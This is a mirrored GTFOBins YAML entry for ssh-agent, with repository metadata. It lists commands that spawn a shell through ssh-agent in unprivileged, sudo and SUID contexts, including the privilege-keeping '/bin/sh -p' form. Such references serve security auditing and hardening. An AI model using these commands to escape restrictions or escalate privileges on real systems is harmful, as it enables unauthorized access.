1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/ssh-agent
2026-01-07 21:59:13 +01:00

14 lines
192 B
Plaintext

---
functions:
shell:
- code: |-
ssh-agent /bin/sh
contexts:
sudo:
suid:
code: |-
ssh-agent /bin/sh -p
shell: false
unprivileged:
...